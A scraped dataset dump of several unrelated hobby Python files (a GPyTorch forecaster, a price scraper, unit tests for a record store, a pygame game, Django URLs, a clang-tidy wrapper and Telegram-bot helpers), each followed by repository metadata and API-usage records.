                gpytorch.kernels.MaternKernel())
        elif kernel.lower() in ['sm', 'spectralmixture', 'spectral']:
            covar_module = gpytorch.kernels.SpectralMixtureKernel(
                num_mixtures=num_mixtures)
            covar_module.initialize_from_data(train_x, train_y)
        elif kernel.lower() == 'rbf':
            covar_module = gpytorch.kernels.ScaleKernel(
                gpytorch.kernels.RBFKernel())
        else:
            raise ValueError("Kernel not implemented: {}".format(kernel))

        # SingleTaskGP expects 2-D (n, 1) inputs and targets.
        self.model = SingleTaskGP(train_x.view(-1, 1), train_y.reshape(-1, 1),
                                  covar_module=covar_module,
                                  likelihood=gpytorch.likelihoods.GaussianLikelihood())
        self.model.mean_module = mean_module

    def Train(self, train_iters=400, display=False):
        """Fit hyperparameters by maximizing the exact marginal log
        likelihood with botorch's torch-optimizer loop."""
        mll = gpytorch.mlls.ExactMarginalLogLikelihood(
            self.model.likelihood, self.model)
        fit_gpytorch_torch(mll, options={'maxiter': train_iters,
                                         'disp': display})

    def Forecast(self, test_x, nsample=100):
        """Draw ``nsample`` posterior sample paths at ``test_x``.

        EWMA-family means go through the custom rollout routine so the
        rolling mean is updated along each sampled path.
        """
        if not isinstance(self.model.mean_module,
                          (EWMAMean, DEWMAMean, TEWMAMean)):
            samples = self.model.posterior(test_x).sample(
                torch.Size((nsample, )))
        else:
            samples = nonvol_rollouts(self.model.train_inputs[0].squeeze(),
                                      self.model.train_targets.squeeze(),
                                      test_x, self.model, nsample)
        return samples.squeeze()
{
"api_name": "gpytorch.means.ConstantMean",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "gpytorch.means",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "voltron.means.EWMAMean",
"line_number": 17,
"usage_type": "call"
},
{
"api_name":... |
import gspread
import pandas as pd
import os
import requests
from google.oauth2 import service_account
# from oauth2client.service_account import ServiceAccountCredentials
from bs4 import BeautifulSoup

# OAuth scopes for Sheets + Drive access via the service account.
scope = ['https://spreadsheets.google.com/feeds',
         'https://www.googleapis.com/auth/drive']
# Service-account key file is expected in the working directory.
secret_file = os.path.join(os.getcwd(), 'client_secret.json')
credentials = service_account.Credentials.from_service_account_file(
    secret_file, scopes=scope)
gc = gspread.authorize(credentials)
# Hard-coded spreadsheet; the "Fontes" worksheet's first data row holds
# the column headers (promoted below).
sht1 = gc.open_by_key('1Jgsf-5wtsCdyDiIp-P_EZbnoT6Ya_0URC3I8s1-5GeM')
df = pd.DataFrame(sht1.worksheet("Fontes").get_all_values()[1:])
df.columns = df.iloc[0]
df.drop(df.index[0], inplace=True)
# Browser-like headers so the target shop serves the normal page.
# NOTE(review): the adjacent string literals are concatenated with no
# separating space (e.g. "...x64)AppleWebKit..."); confirm the intended
# User-Agent value.
header = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64)"
          "AppleWebKit/537.36 (KHTML, like Gecko)"
          "Chrome/54.0.2840.71 Safari/537.36",
          "upgrade-insecure-requests": "1",
          "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,"
          "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
          "accept-encoding": "gzip, deflate, br",
          "accept-language": "en-GB,en-US;q=0.9,en;q=0.8",
          "cache-control": "max-age=0"}
# Scrape the first competitor link and pull the price from the
# "preco_normal" div, dropping the "R$" currency prefix.
# NOTE(review): soup.find(...) returns None if the page layout changes,
# which would raise AttributeError on `.text` — assumes the div exists.
res = requests.get(df['Competitor Link'].iloc[0], headers=header)
soup = BeautifulSoup(res.text, "html.parser")
price = soup.find("div", {"class": "preco_normal"}).text.replace("R$", "")
print(price)
# Write the scraped price back into cell C3 of the same worksheet.
sht1.worksheet("Fontes").update_acell('C3', price)
| arthurnovello/PriceMonitor | app.py | app.py | py | 1,467 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "google.oauth2.service_account.Cre... |
20505915805 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2012 David Townshend
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 675 Mass Ave, Cambridge, MA 02139, USA.
from norman._six import assert_raises
from norman import NotSet, Field, Store, Index
try:
from unittest.mock import Mock, patch
except ImportError:
from mock import Mock, patch
##### Index tests
class TestIndex_Ordered(object):
    '''Index with an orderable key function, pre-populated with six ordered
    records (keys 0,1,2,3,3,4) and three records in the unordered buckets.'''
    def setup(self):
        # Identity key -> every inserted key sorts normally.
        field = Mock(key=lambda x: x)
        self.i = Index(field)
        self.orecords = ['M' + str(i) for i in range(6)]
        self.urecords = ['U0', 'U1', 'U2']
        # Mirror the same data into the index and into local "expected" copies.
        self.i._ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
        self.ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
        self.unordered = self.i._unordered.copy()
        self.i._unordered[-1] = [('1', self.urecords[0]),
                                 ('1', self.urecords[1])]
        self.i._unordered[-2] = [('2', self.urecords[2])]
        self.unordered[-1] = [('1', self.urecords[0]),
                              ('1', self.urecords[1])]
        self.unordered[-2] = [('2', self.urecords[2])]
    def test_insert(self):
        # Inserting key 1 keeps the key list sorted; unordered side untouched.
        r = Mock()
        self.i.insert(1, r)
        self.orecords.insert(2, r)
        assert self.i._ordered == ([0, 1, 1, 2, 3, 3, 4], self.orecords)
        assert self.i._unordered == self.unordered
    def test_len(self):
        # 6 ordered + 3 unordered records.
        assert len(self.i) == 9, len(self.i)
    def test_remove(self):
        self.i.remove(2, self.orecords[2])
        del self.orecords[2]
        expect = ([0, 1, 3, 3, 4], self.orecords)
        assert self.i._ordered == expect
        assert self.i._unordered == self.unordered
    def test_iter_eq(self):
        # Key 3 occurs twice (positions 3 and 4).
        got = set(self.i == 3)
        expect = set(self.orecords[3:5])
        assert got == expect, (got, expect)
    def test_iter_ne(self):
        # != also yields the unordered records.
        expect = set(self.orecords[:3] + self.orecords[5:] + self.urecords)
        got = set(self.i != 3)
        assert got == expect, (got, expect)
    def test_iter_lt(self):
        got = set(self.i < 3)
        expect = set(self.orecords[:3])
        assert got == expect, (got, expect)
    def test_iter_le(self):
        got = set(self.i <= 3)
        expect = set(self.orecords[:5])
        assert got == expect, (got, expect)
    def test_iter_gt(self):
        got = set(self.i > 2)
        expect = set(self.orecords[3:])
        assert got == expect, (got, expect)
    def test_iter_ge(self):
        got = set(self.i >= 2)
        expect = set(self.orecords[2:])
        assert got == expect, (got, expect)
class TestIndex_UnOrdered(object):
    '''Index whose field key always raises TypeError, forcing every insert
    down the unordered (hash / id keyed) code path.'''
    def setup(self):
        def key(value):
            raise TypeError
        field = Mock(key=key)
        self.i = Index(field)
        self.orecords = ['M' + str(i) for i in range(6)]
        self.urecords = ['U0', 'U1', 'U2']
        self.i._ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
        self.ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
        self.unordered = self.i._unordered.copy()
        self.i._unordered[-1] = [('1', self.urecords[0]),
                                 ('1', self.urecords[1])]
        self.i._unordered[-2] = [('2', self.urecords[2])]
        self.unordered[-1] = [('1', self.urecords[0]),
                              ('1', self.urecords[1])]
        self.unordered[-2] = [('2', self.urecords[2])]
        # Patch hash() to -int(v) (TypeError for non-numeric strings) and
        # id() to a constant so bucket keys are predictable in the tests.
        def mockhash(v):
            try:
                return -int(v)
            except ValueError:
                raise TypeError
        patch('norman._store.hash', mockhash, create=True).start()
        patch('norman._store.id', lambda v: 10, create=True).start()
    def teardown(self):
        patch.stopall()
    def test_insert1(self):
        # New hashable key -> new bucket at mockhash('4') == -4.
        r = Mock()
        self.i.insert('4', r)
        self.unordered[-4] = [('4', r)]
        assert self.i._unordered == self.unordered
        assert self.i._ordered == self.ordered
    def test_insert2(self):
        # Existing bucket -> entry appended to it.
        r = Mock()
        self.i.insert('2', r)
        self.unordered[-2].append(('2', r))
        assert self.i._unordered == self.unordered
        assert self.i._ordered == self.ordered
    def test_insert_id(self):
        # Unhashable key ('a' raises in mockhash) falls back to id(), mocked to 10.
        r = Mock()
        self.i.insert('a', r)
        self.unordered[10] = [('a', r)]
        assert self.i._unordered == self.unordered
        assert self.i._ordered == self.ordered
    def test_insert_NotSet(self):
        r = Mock()
        self.i.insert(NotSet, r)
        self.unordered[NotSet] = [(NotSet, r)]
        assert self.i._unordered == self.unordered
        assert self.i._ordered == self.ordered
    def test_remove(self):
        self.i.remove('1', self.urecords[1])
        self.unordered[-1].pop()
        assert self.i._unordered == self.unordered
        assert self.i._ordered == self.ordered
    def test_remove_id(self):
        # Removing the last entry deletes the whole bucket.
        self.i.remove('2', self.urecords[2])
        del self.unordered[-2]
        assert self.i._unordered == self.unordered
        assert self.i._ordered == self.ordered
    def test_iter_eq(self):
        expect = set(self.urecords[:2])
        got = set(self.i == '1')
        assert got == expect, (got, expect)
    def test_iter_ne(self):
        expect = set([self.urecords[2]] + self.orecords)
        got = set(self.i != '1')
        assert got == expect, (got, expect)
    def test_comparison(self):
        # Ordering comparisons are meaningless for unorderable keys.
        with assert_raises(TypeError):
            set(self.i < '1')
        with assert_raises(TypeError):
            set(self.i <= '1')
        with assert_raises(TypeError):
            set(self.i > '1')
        with assert_raises(TypeError):
            set(self.i >= '1')
class TestIndexCornerCases(object):
    '''Edge cases for Index.'''
    def test_notset(self):
        # Inserting the NotSet sentinel lands in the NotSet unordered bucket.
        field = Field()
        i = Index(field)
        r = Mock()
        i.insert(NotSet, r)
        assert i._unordered[NotSet] == [(NotSet, r)]
class TestStore(object):
    '''Behavioural tests for Store with one fully-populated field and one
    sparsely-populated field (default -1).'''
    def setup(self):
        self.full = Field(default=NotSet)
        self.sparse = Field(default=-1)
        self.missing = Field(default=NotSet)
        self.full._name = 'full'
        self.sparse._name = 'sparse'
        self.missing._name = 'missing'
        self.store = Store()
        self.store.add_field(self.full)
        self.store.add_field(self.sparse)
    def populate(self):
        # Records '0'..'4'; `full` set on all, `sparse` only on '1' and '3'.
        for i in range(5):
            self.store.add_record(str(i))
            self.store.set(str(i), self.full, i)
        for i in [1, 3]:
            self.store.set(str(i), self.sparse, i)
    def test_add_field(self):
        # A field added after records exist reads as its default (NotSet).
        self.populate()
        self.store.add_field(self.missing)
        assert self.store.get('0', self.missing) == NotSet
    def test_add_record(self):
        self.store.add_record('new')
        assert self.store.has_record('new')
    def test_clear(self):
        self.populate()
        self.store.clear()
        assert self.store.record_count() == 0
        for index in self.store.indexes.values():
            assert len(index) == 0
    def test_get(self):
        self.populate()
        assert self.store.get('0', self.full) == 0
    def test_has_record(self):
        self.populate()
        assert self.store.has_record('0')
        assert not self.store.has_record('not a record')
    def test_iter_field_full(self):
        self.populate()
        got = set(self.store.iter_field(self.full))
        expect = set([(str(i), i) for i in range(5)])
        assert got == expect, got
    def test_iter_field_sparse(self):
        # Records without an explicit value yield the field default (-1).
        self.populate()
        got = set(self.store.iter_field(self.sparse))
        expect = set([('0', -1), ('1', 1), ('2', -1), ('3', 3), ('4', -1)])
        assert got == expect, got
    def test_iter_records(self):
        self.populate()
        it = self.store.iter_records()
        # set('012324') == {'0','1','2','3','4'}; the duplicate char collapses.
        assert set(it) == set('012324')
    def test_record_count(self):
        self.populate()
        assert self.store.record_count() == 5
    def test_remove_record(self):
        self.populate()
        self.store.remove_record('3')
        assert set(self.store.iter_records()) == set('0124')
    def test_remove_field(self):
        # This merely tests that it runs.
        self.populate()
        self.store.remove_field(self.full)
    def test_set_overwrite(self):
        # Setting an already-set field replaces the value.
        self.populate()
        self.store.set('1', self.sparse, 'new value')
        assert self.store.get('1', self.sparse) == 'new value'
class TestStoreIndex(object):
    '''Checks that Store keeps its per-field Index structures in sync with
    record addition, removal and field assignment.'''
    def setup(self):
        self.f = Field()
        self.f._name = 'f'
        self.store = Store()
        self.store.add_field(self.f)
        # Index object the store maintains for this field.
        self.index = self.store.indexes[self.f]
    def test_add_record(self):
        # New records start in the NotSet bucket of the unordered side.
        self.store.add_record('new')
        assert self.index._unordered[NotSet] == [(NotSet, 'new')]
        assert self.index._ordered == ([], [])
    def test_remove_record(self):
        self.store.add_record('new')
        self.store.remove_record('new')
        assert self.index._unordered == {}
        assert self.index._ordered == ([], [])
    def test_set(self):
        # Setting a value moves the record from unordered to ordered.
        self.store.add_record('new')
        self.store.set('new', self.f, 'value')
        assert self.index._unordered == {}
        assert self.index._ordered == ([('1str', 'value')], ['new'])
| aquavitae/norman | tests/test_store.py | test_store.py | py | 10,128 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "mock.Mock",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "norman.Index",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"line_number": 103,
... |
17337628519 | import pygame, sys, time, random
from pygame.locals import *
# Set up pygame.
pygame.init()
mainClock = pygame.time.Clock()
# Set up the window.
WINDOWWIDTH = 400
WINDIWHEIGHT = 400
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDIWHEIGHT), 0, 32)
pygame.display.set_caption('Спрайты и звуки')
# Colour constants.
WHITE = (255, 255, 255)
# Player rect plus sprite images (the player image is scaled to the rect).
player = pygame.Rect(300, 100, 40, 40)
playerImage = pygame.image.load('player.png')
playerStretchedImage = pygame.transform.scale(playerImage, (40, 40))
foodImage = pygame.image.load('cherry.png')
# Twenty food squares at random positions.
foods = []
for i in range(20):
    foods.append(pygame.Rect(random.randint(0, WINDOWWIDTH - 20),
                             random.randint(0, WINDIWHEIGHT - 20), 20, 20))
# A new food square is spawned every NEWFOOD frames.
foodCounter = 0
NEWFOOD = 40
# Keyboard state variables.
moveLeft = False
moveRight = False
moveUp = False
moveDown = False
MOVESPEED = 6
# Set up the sounds / background music.
pickUpSound = pygame.mixer.Sound('pickup.wav')
pygame.mixer.music.load('gameover.wav')
pygame.mixer.music.play(-1, 0.0)
musicPlaying = True
# Run the game loop.
while True:
    # Check for the QUIT event and input events.
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        if event.type == KEYDOWN:
            # Update the keyboard state variables.
            if event.key == K_LEFT or event.key == K_a:
                moveRight = False
                moveLeft = True
            if event.key == K_RIGHT or event.key == K_d:
                moveLeft = False
                moveRight = True
            if event.key == K_UP or event.key == K_w:
                moveDown = False
                moveUp = True
            if event.key == K_DOWN or event.key == K_s:
                moveUp = False
                moveDown = True
        if event.type == KEYUP:
            if event.key == K_ESCAPE:
                pygame.quit()
                sys.exit()
            if event.key == K_LEFT or event.key == K_a:
                moveLeft = False
            if event.key == K_RIGHT or event.key == K_d:
                moveRight = False
            if event.key == K_UP or event.key == K_w:
                moveUp = False
            if event.key == K_DOWN or event.key == K_s:
                moveDown = False
            if event.key == K_x:
                # Teleport the player to a random position.
                player.top = random.randint(0, WINDIWHEIGHT - player.height)
                player.left = random.randint(0, WINDOWWIDTH - player.width)
            if event.key == K_m:
                # Toggle the background music on/off.
                if musicPlaying:
                    pygame.mixer.music.stop()
                else:
                    pygame.mixer.music.play(-1, 0.0)
                musicPlaying = not musicPlaying
        if event.type == MOUSEBUTTONUP:
            # Drop a new food square centred on the mouse click.
            foods.append(pygame.Rect(event.pos[0] - 10, event.pos[1] - 10,
                                     20, 20))
    foodCounter += 1
    if foodCounter >= NEWFOOD:
        # Add new food at a random position.
        foodCounter = 0
        foods.append(pygame.Rect(random.randint(0, WINDOWWIDTH - 20),
                                 random.randint(0, WINDIWHEIGHT - 20),
                                 20, 20))
    # Draw the white background onto the surface.
    windowSurface.fill(WHITE)
    # Move the player (clamped to the window edges).
    if moveDown and player.bottom < WINDIWHEIGHT:
        player.top += MOVESPEED
    if moveUp and player.top > 0:
        player.top -= MOVESPEED
    if moveLeft and player.left > 0:
        player.left -= MOVESPEED
    if moveRight and player.right < WINDOWWIDTH:
        player.right += MOVESPEED
    # Draw the player sprite onto the surface.
    windowSurface.blit(playerStretchedImage, player)
    # Check whether the player has intersected any food squares.
    for food in foods[:]:
        if player.colliderect(food):
            foods.remove(food)
            # Grow the player by 2px per food eaten and rescale the sprite.
            player = pygame.Rect(player.left, player.top,
                                 player.width + 2, player.height + 2)
            playerStretchedImage = pygame.transform.scale(playerImage,
                                                          (player.width,
                                                           player.height))
            if musicPlaying:
                pickUpSound.play()
    # Draw the food.
    for food in foods:
        windowSurface.blit(foodImage, food)
    # Draw the window onto the screen, capped at 40 FPS.
    pygame.display.update()
    mainClock.tick(40)
{
"api_name": "pygame.init",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "pygame.time.Clock",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pygame.time",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "pygame.display.set_mode",... |
39394256532 | from django.conf.urls.static import static
from django.contrib.auth.decorators import login_required
from django.urls import path
from . import views
from .views import AddPostView, UserSettings, UserProfile
from .models import Profile
from newsletter.models import NewsLetter
# URL routes for the blog app. Profile-related views are wrapped in
# login_required; the '<slug:slug>/' catch-all must stay below the literal
# single-segment routes above it so they keep matching first.
urlpatterns = [
    # Home page: post list.
    path(
        "",
        views.PostList.as_view(),
        name="home"
    ),
    path(
        'featured/',
        views.FeaturedView.as_view(),
        name='featured'
    ),
    path(
        'featured_post/',
        views.FeaturedPost,
        name='featured_post'
    ),
    # Authenticated-only profile pages.
    path(
        'profile/',
        login_required(UserProfile.as_view()),
        name='profile'
    ),
    path(
        '<pk>/delete_profile/',
        login_required(views.DeleteProfile.as_view()),
        name='delete_profile'
    ),
    path(
        'edit_profile/',
        login_required(UserSettings.as_view()),
        name='edit_profile'
    ),
    path(
        'add_post/',
        AddPostView.as_view(),
        name='add_post'
    ),
    path(
        'pets/',
        views.PetsPost,
        name='pets'
    ),
    # Catch-all single-segment route: post detail by slug.
    path(
        '<slug:slug>/',
        views.PostDetail.as_view(),
        name='post_detail'
    ),
    path(
        'like/<slug:slug>/',
        views.PostLike.as_view(),
        name='post_like'
    ),
    path(
        '<int:id>/delete-post',
        views.delete_post,
        name='delete_post'
    ),
    path(
        'edit/<int:post_id>',
        views.edit_post,
        name='edit_post'
    ),
]
| JodyMurray/p4-plant-blog | blog/urls.py | urls.py | py | 1,567 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "views.PostList.as_view",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "views.PostList",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "django.ur... |
26904261036 | from collections import deque
def bfs(graph, root):
    """Breadth-first search over an adjacency-list dict.

    Returns the set of vertices reachable from `root` by a path of length
    >= 1; `root` itself is included only when it lies on a cycle (the very
    first dequeued node is deliberately not marked visited).
    """
    reached = set()
    pending = deque([root])
    first_pop = True
    while pending:
        node = pending.popleft()
        if node in reached:
            continue
        if not first_pop:
            reached.add(node)
        first_pop = False
        for neighbour in graph[node]:
            if neighbour not in reached:
                pending.append(neighbour)
    return reached
# BOJ 11403 (Find Path): read an n x n adjacency matrix, then for every
# vertex print a row marking which vertices are reachable by a path of
# length >= 1.
n = int(input())
lst = []
dic = {}
for _ in range(n):
    lst.append(list(map(int, input().split())))
# Convert the matrix into an adjacency-list dict.
for i in range(n):
    dic[i] = []
    for j in range(n):
        if lst[i][j] == 1:
            a = dic[i]
            a.append(j)
lst_ans = [[0]*n for _ in range(n)]
# One BFS per start vertex fills in its reachability row.
for i in range(n):
    visited_current = bfs(dic, i)
    for node in visited_current:
        lst_ans[i][node] = 1
for i in range(n):
    for j in range(n):
        print(lst_ans[i][j], end=" ")
    print()
# Floyd-Warshall would be simpler here.
# Floyd-Warshall seems useful in many problems.
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "call"
}
] |
73042146593 | # This program returns the current weather description of a requested place.
import requests
def get_weather(city):
    """Query OpenWeatherMap for `city`.

    Returns a dict with 'temp_min', 'temp_max', 'temp_feel' (metric) and
    'description', or the string "city not found" when the API reports an
    unknown city.
    """
    # NOTE(review): the API key is hard-coded; consider moving it to config.
    api_key = "6259067ceac0680e898834ae9b3e9835"
    url = "http://api.openweathermap.org/data/2.5/weather?q=" \
        + city + "&appid=" + api_key + "&units=metric"
    request = requests.get(url)
    json = request.json()
    if json.get('message') == 'city not found':
        return "city not found"
    # NOTE(review): other API errors (e.g. invalid key) are not handled and
    # would raise below when 'weather' is absent — confirm that is acceptable.
    description = json.get("weather")[0].get("description")
    temp_min = json.get("main")["temp_min"]
    temp_max = json.get("main")["temp_max"]
    temp_feel = json.get("main")["feels_like"]
    return {'temp_min': temp_min,
            'temp_max': temp_max,
            'temp_feel': temp_feel,
            'description': description}
def main():
    """Prompt for a place name and print today's forecast for it."""
    city = input("What place do you want to get the weather of?\n")
    weather_dict = get_weather(city)
    if weather_dict == "city not found":
        print("This city is not part of the OpenWeatherMap database.")
        return
    # Local names chosen so the builtins min/max are not shadowed.
    low = weather_dict.get('temp_min')
    high = weather_dict.get('temp_max')
    feels = weather_dict.get('temp_feel')
    summary = weather_dict.get('description')
    print("For " + city + ", today's forecast is " + summary + ".")
    print("The minimal temperature is:", low, "degrees Celcius.")
    print("The maximal temperature is:", high, "degrees Celcius.")
    if feels > high:
        print("But don't worry, it feels like", feels, "degrees Celcius.")
    elif feels >= low:
        print("It feels like", feels, "degrees Celcius.")
    else:
        print("But I'm sorry, it feels like", feels, "degrees Celcius.")
# Script entry point; runs immediately (no __main__ guard in the original).
main()
{
"api_name": "requests.get",
"line_number": 10,
"usage_type": "call"
}
] |
22497223453 | #!/usr/bin/env python3
import argparse
import sys
import shutil
from utils import utils
from typing import List
def parse_args(av: List[str]):
    """Split `av` into recognized options and everything else.

    Returns (namespace, remainder); the remainder is forwarded verbatim to
    clang-tidy by the caller.
    """
    cli = argparse.ArgumentParser(description="Run / check clang-tidy on staged cpp files.")
    cli.add_argument(
        "--clang-tidy-executable",
        action="store",
        required=False,
        help="Specific clang-tidy binary to use.",
    )
    known, remainder = cli.parse_known_args(av)
    return known, remainder
def main(av: List[str]):
    """Run clang-tidy over the staged C++ files, forwarding unknown CLI
    arguments straight to clang-tidy. Skips entirely when nothing relevant
    is staged.
    """
    known_args, clang_tidy_args = parse_args(av)
    clang_tidy_executable = known_args.clang_tidy_executable
    if not clang_tidy_executable:
        # Fall back to whatever clang-tidy is on PATH.
        clang_tidy_executable = shutil.which("clang-tidy")
    # Fix: the original computed project_root twice; once is enough.
    project_root = utils.get_project_root()
    candidate_files = [
        f.as_posix() for f in utils.get_staged_git_files(project_root) if f.suffix in utils.CPP_EXTENSIONS
    ]
    cmd = [clang_tidy_executable] + clang_tidy_args + candidate_files
    if len(candidate_files) > 0:
        print("Running clang-tidy")
        utils.run_command_and_echo_on_error(cmd)
    else:
        print("Skipping clang-tidy (no cpp files staged)")
if __name__ == "__main__":
    # Forward CLI args (minus the program name) to main().
    main(sys.argv[1:])
| CesiumGS/cesium-omniverse | scripts/clang_tidy.py | clang_tidy.py | py | 1,188 | python | en | code | 27 | github-code | 1 | [
{
"api_name": "typing.List",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "utils.utils.get_projec... |
14724616321 | from decimal import Decimal, getcontext
import requests
from utils.utils import get_data
from utils import config
# Base URL of the backing REST API, taken from the bot config.
DB_API_URL = config.DB_API_URL
async def rate(valute):
    """Rouble rate for one unit of `valute`, scaled by the `k_yuany`
    multiplier from the settings record; returned as a Decimal.
    """
    cbr = requests.get('https://www.cbr-xml-daily.ru/daily_json.js').json()
    quote = cbr['Valute'][valute]
    # Fix: CBR quotes are per `Nominal` units of the currency (10 for CNY).
    # The original divided by a hard-coded 10, which is only correct for CNY;
    # dividing by the quote's own Nominal generalises to any currency code
    # while giving the same result for CNY.
    per_unit = quote['Value'] / quote['Nominal']
    url = f'{DB_API_URL}settings/1/'
    s = await get_data(url)
    r = Decimal(per_unit * s['k_yuany'])
    return r
async def settings(valute, cost, count):
    """Total price: (per-item cost * currency rate + flat commission) * count.

    `cost` and `count` may arrive as strings and are coerced to int.
    """
    r = await rate(valute)
    url = f'{DB_API_URL}settings/1/'
    s = await get_data(url)
    cost = int(cost)
    count = int(count)
    # NOTE(review): `sum` shadows the builtin; also r is a Decimal, so
    # Decimal + float would raise — presumably k_comis_1 is an int. Confirm.
    sum = Decimal((cost*r+s['k_comis_1'])*count)
    return sum
async def comission():
    """Fetch the flat commission (`k_comis_1`) from the settings record."""
    settings_url = f'{DB_API_URL}settings/1/'
    record = await get_data(settings_url)
    return record['k_comis_1']
| IgorOlenchuk/bot_mypoison | bot/utils/settings.py | settings.py | py | 790 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "utils.config.DB_API_URL",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "utils.config",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "utils.utils.get_... |
19416966323 | import calendar
import datetime
from math import ceil
import numpy as np
from aiogram.dispatcher import FSMContext
from aiogram.types import Message, ReplyKeyboardRemove, InlineKeyboardMarkup, \
InlineKeyboardButton, CallbackQuery
from utils.db_api.models import DBCommands
from data.config import days, months
from loader import dp, bot
db = DBCommands()
# Item 1 is the message text, item 2 is the keyboard.
async def return_kb_mes_services(message, state):
    """Build and send the paginated "choose a service" inline keyboard.

    Splits the service list into pages of 5, stores per-page number->name
    maps, keyboards and message texts in the FSM state, then answers with
    the page indicated by state['page'].
    """
    await state.update_data(
        {'services_by_page': {1: {}},
         'keyboards': {1: {}},
         'all_result_messages': {1: {}},
         'page': 1}
    )
    data_from_state = await state.get_data()
    services = await db.all_services()
    if len(services) <= 5:
        # Single page: one keyboard, no pagination buttons.
        choice_service_kb = InlineKeyboardMarkup(row_width=5)
        res_message = ''
        # current_services_dict = {}
        for num, service in enumerate(services, 1):
            res_message += f'{num}. {service.name} - {service.price}\n'
            res_message += '\n'
            data_from_state.get('services_by_page')[1].update({str(num): service.name})
            # current_services_dict[str(num)] = service.name
            choice_service_kb.insert(InlineKeyboardButton(f'{num}',
                                                          callback_data=f's_{num}'))
        data_from_state.get('keyboards').update({1: choice_service_kb})
        data_from_state.get('all_result_messages').update({1: res_message})
        await state.update_data(data_from_state)
    elif len(services) > 5:
        data_from_state.get('services_by_page').clear()
        number_of_pages = ceil(len(services) / 5)
        # Cumulative split points (5, 10, 15, ...) for np.array_split.
        rule_np_list = []
        for i in range(number_of_pages):
            if i == 0:
                rule_np_list.append(5)
                continue
            rule_np_list.append(rule_np_list[i - 1] + 5)
        services_by_pages = np.array_split(services, rule_np_list)
        # Pre-build each page's keyboard with the right nav arrows:
        # first page -> only "next", last page -> only "prev", middle -> both.
        keyboards_inside = {}
        for page_num in range(number_of_pages):
            if page_num == 0:
                keyboards_inside.update(
                    {page_num + 1: InlineKeyboardMarkup(row_width=5, inline_keyboard=[
                        [InlineKeyboardButton('➡️', callback_data='next_page')]]
                    )})
                continue
            if page_num == list(range(number_of_pages))[-1]:
                keyboards_inside.update(
                    {page_num + 1: InlineKeyboardMarkup(row_width=5, inline_keyboard=[
                        [InlineKeyboardButton('⬅️', callback_data='pre_page')]]
                    )})
                continue
            keyboards_inside.update({page_num + 1: InlineKeyboardMarkup(row_width=5, inline_keyboard=[
                [InlineKeyboardButton('⬅️', callback_data='pre_page')],
                [InlineKeyboardButton('➡️', callback_data='next_page')]])})
        # Fill each page's keyboard and message text with its services.
        for page_num, page in enumerate(range(number_of_pages), 1):
            data_from_state.get('services_by_page').update({page_num: {}})
            res_message = ''
            for num, service in enumerate(list(services_by_pages)[page], 1):
                service_button = InlineKeyboardButton(str(num), callback_data=f's_{num}')
                data_from_state.get('services_by_page')[page_num].update({str(num): service.name})
                if num == 1:
                    # First button starts a new keyboard row.
                    keyboards_inside[page_num].add(service_button)
                    res_message += f'{num}. {service.name} - {service.price}\n'
                    res_message += '\n'
                    continue
                keyboards_inside[page_num].insert(service_button)
                res_message += f'{num}. {service.name} - {service.price}\n'
                res_message += '\n'
            res_message += f'Страница {page_num} из {number_of_pages}'
            data_from_state.get('all_result_messages').update({page_num: res_message})
        data_from_state.get('keyboards').update(keyboards_inside)
        await state.update_data(data_from_state)
    await message.answer(
        f"Выберите услугу:\n\n{data_from_state.get('all_result_messages')[data_from_state.get('page')]}",
        reply_markup=data_from_state.get('keyboards')[data_from_state.get('page')])
    # return res_message, choice_service_kb
async def date_process_enter(state, year, month, day, service=True, call=None, message=None, is_it_for_master=False,
                             master_id=None):
    """Render an inline-keyboard month calendar for picking a date.

    Used for client appointment booking (service=True) and for master-side
    views (master_id / is_it_for_master); weekend days, past days and
    other-month cells become inert buttons. `call` or `message` supplies the
    chat to answer in.
    """
    response = call.message if call else message
    data = await state.get_data()
    c = calendar.TextCalendar(calendar.MONDAY)
    master = await db.get_master_by_id(master_id) if master_id else await db.get_master_by_id(response.chat.id)
    # master = await db.get_master_by_id(response.chat.id)
    all_date_logs = [log.date for log in await db.get_all_master_logs(master.master_name)]
    if service:
        service = await db.get_service(data.get('service'))
